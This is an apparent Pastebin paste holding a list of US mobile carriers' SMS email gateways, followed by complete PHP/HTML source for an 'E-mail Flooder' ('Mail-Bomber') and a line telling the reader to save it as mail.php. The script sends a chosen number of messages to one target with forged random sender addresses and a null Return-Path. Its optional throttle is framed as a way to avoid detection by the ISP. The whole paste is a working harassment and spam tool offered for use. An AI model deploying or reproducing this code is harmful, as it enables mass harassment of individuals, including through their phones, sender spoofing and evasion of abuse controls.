Advertisement
Guest User

Untitled

a guest
Jun 4th, 2017
739
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.97 KB | None | 0 0
  1. Alltel
  2. Example: 2125551212@message.alltel.com
  3.  
  4. AT&T
  5. Example: 2125551212@txt.att.net
  6.  
  7. Boost Mobile
  8. Example: 2125551212@myboostmobile.com
  9.  
  10. Nextel
  11. Example: 7035551234@messaging.nextel.com
  12.  
  13. Sprint
  14. Example: 2125551234@messaging.sprintpcs.com
  15.  
  16. T-Mobile
  17. Example: 4251234567@tmomail.net
  18.  
  19. Verizon
  20. Example: 5552223333@vtext.com
  21.  
  22. Virgin Mobile
  23. Example: 5551234567@vmobl.com
  24.  
  25.  
  26. <html>
  27. <head>
  28. <style type="text/css">
  29. .header
  30. {
  31. background-color: #ffccaa;
  32. }
  33.  
  34. .cell1
  35. {
  36. background-color: #ffeeca;
  37. width: 50%;
  38. }
  39.  
  40. .cell2
  41. {
  42. background-color: #ffeeca;
  43. }
  44.  
  45. body
  46. {
  47. font: normal 0.8em Verdana, sans-serif;
  48. background-color: #FFFFEE;
  49. }
  50.  
  51. smalltext
  52. {
  53. font: normal .8em Verdana, sans-serif;
  54. }
  55. </style>
  56. <script language="javascript" type="text/javascript">
  57. function randclick()
  58. {
  59. var random = document.getElementById('randbox').checked;
  60. document.getElementById('frombox').disabled = random;
  61. document.getElementById('replybox').disabled = random;
  62. }
  63. function floodc()
  64. {
  65. var fc = document.getElementById('floodbox').checked;
  66. if(!fc)
  67. {
  68. alert("Turning flood control off almost guarantees detection and action by your ISP.\nOnly turn this off if you are SURE it's okay with your ISP to send the amount of e-mail you plan to send.");
  69. }
  70. }
  71. </script>
  72. <title>E-mail Flooder</title>
  73. </head>
  74. <body>
  75. <center>
  76. <h3>Requires an SMTP and Web server</h3>
  77. <?
  78.  
  79.  
  80. function randomEmail()
  81. {
  82. // returns a random, spoofed e-mail address.
  83. // pick two numbers, one in
  84. // [6-10] range, one in [4-20] range, and a random domain.
  85. // for each #, generate that many random letters/numbers, splice together.
  86. $usernum = rand(3,10);
  87. $domainnum = rand(4,10);
  88. $userstr="";
  89. $domainstr="";
  90. for($u=0;$u<$usernum;$u++)
  91. {
  92. // random letter of alphabet.
  93. $ranletter = chr( ord("a") + rand(0, 25) );
  94. $userstr.=$ranletter;
  95. }
  96.  
  97. for($d=0;$d<$domainnum;$d++)
  98. {
  99. // random letter of alphabet.
  100. $ranletter = chr( ord("a") + rand(0, 25) );
  101. $domainstr.=$ranletter;
  102. }
  103.  
  104. $email = "$userstr@$domainstr.com";
  105. return $email;
  106.  
  107. }
  108.  
  109.  
  110. $action =$_POST["submit"];
  111.  
  112. if($action!=" SPAM ")
  113. {
  114.  
  115. ?>
  116. <form method="post" action="?" name="inputpanel">
  117. <table border="1" cellpadding="2">
  118. <tr>
  119. <td colspan="2" class="header">
  120. <p align="center" style="color: ; font-size: 1.5em">E-Mail Flooder</td>
  121. </tr>
  122. <tr>
  123. <td class="cell1">
  124. <p align="right"><b>Subject:</b></td>
  125. <td class="cell2">
  126. <input name="subject" size="30"/>
  127. </td>
  128. </tr>
  129. <tr>
  130. <td colspan="2" class="cell1">
  131. <p align="center">
  132. <b>Message to send:</b>
  133. </p>
  134. </td>
  135. </tr>
  136. <tr>
  137. <td colspan="2" class="cell2">
  138. <p align="center">
  139. <textarea rows="6" cols="55" name="message" class="inputbox" style="overflow:scroll"></textarea></td>
  140. </p>
  141. </tr>
  142. <tr>
  143. <td class="cell1">
  144. <p align="right"><b>To:</b></td>
  145. <td class="cell2">
  146. <input name="emailto" size="30"/>
  147. </td>
  148. </tr>
  149. <tr>
  150. <td class="cell1">
  151. <p align="right"><b>From:</b></td>
  152. <td class="cell2">
  153. <input name="emailfrom" id="frombox" size="30" value="" /><br>
  154. <smalltext>Random</smalltext> <input type="checkbox" id="randbox" name="random" onClick="javascript:randclick();" value="ON">
  155. </td>
  156. </tr>
  157. <tr>
  158. <td class="cell1">
  159. <p align="right"><b>Reply-To:</b></td>
  160. <td class="cell2">
  161. <input name="emailreply" id="replybox" size="30" value="" />
  162. </td>
  163. </tr>
  164. <tr>
  165. <td class="cell1">
  166. <p align="right"><b>Number to Send:</b></td>
  167. <td class="cell2">
  168. <input name="emailquantity" size="5" maxlength="4" value="10" /><br>
  169. <smalltext>Flood Control</smalltext> <input type="checkbox" id="floodbox" name="floodcontrol" onClick="javascript:floodc();" value="ON" checked />
  170. </td>
  171. </tr>
  172. <tr>
  173. <td colspan="2" class="header">
  174. <p align="center"><input class="submit" type="submit" name="submit" value=" SPAM " /></td>
  175. </tr>
  176. </table>
  177. </form>
  178.  
  179. <?
  180. }else
  181. {
  182. $to = $_POST["emailto"];
  183. $from = $_POST["emailfrom"];
  184. $reply = $_POST["emailreply"];
  185. $subj = stripslashes($_POST["subject"]);
  186. $msg = stripslashes($_POST["message"]);
  187. $random = $_POST["random"];
  188. $quantity = $_POST["emailquantity"];
  189. $floodcontrol = $_POST["floodcontrol"];
  190.  
  191. if($to==""||$subj==""||$msg=="")
  192. {
  193. echo "You must fill out the Subject, Message, and Recipient.<br>";
  194. }else
  195. {
  196. if(($from==""||$reply=="")&&$random!="ON")
  197. {
  198. echo "You must enter a sender and a reply-to address.<br>";
  199. }else
  200. {
  201. set_time_limit(0);
  202. // okay
  203. $counter=0;
  204.  
  205. for($e=0;$e<$quantity;$e++)
  206. {
  207. if($random=="ON")
  208. {
  209. $r = randomEmail();
  210. $from = $r;
  211. $reply = $r;
  212. }
  213.  
  214. // we're ready.
  215.  
  216. $headers = "";
  217. $headers.="From: $from\r\n";
  218. $headers.="Reply-To: $from\r\n";
  219. $headers.="Return-Path: null\r\n";
  220.  
  221. $sentaway = @mail($to,$subj,$msg,$headers);
  222.  
  223. if($sentaway)
  224. {
  225. echo "Sent email <b>#$e</b> from <b>$from</b> to <b>$to</b><br>";
  226. }else
  227. {
  228. echo "<font color='red'>Couldn't send email <b>#$e</b></font><br>";
  229. }
  230. $counter++;
  231. if($counter==10&&$floodcontrol)
  232. {
  233. echo "Wait <u>5</u> seconds...<br>";
  234. $counter=0;
  235. sleep(5);
  236. }
  237.  
  238. }
  239.  
  240. set_time_limit(30);
  241. }
  242. }
  243.  
  244. }
  245.  
  246. ?>
  247.  
  248. </center>
  249. <!-- Mail-Bomber -->
  250. </body>
  251. </html>
  252.  
  253. save html as mail.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement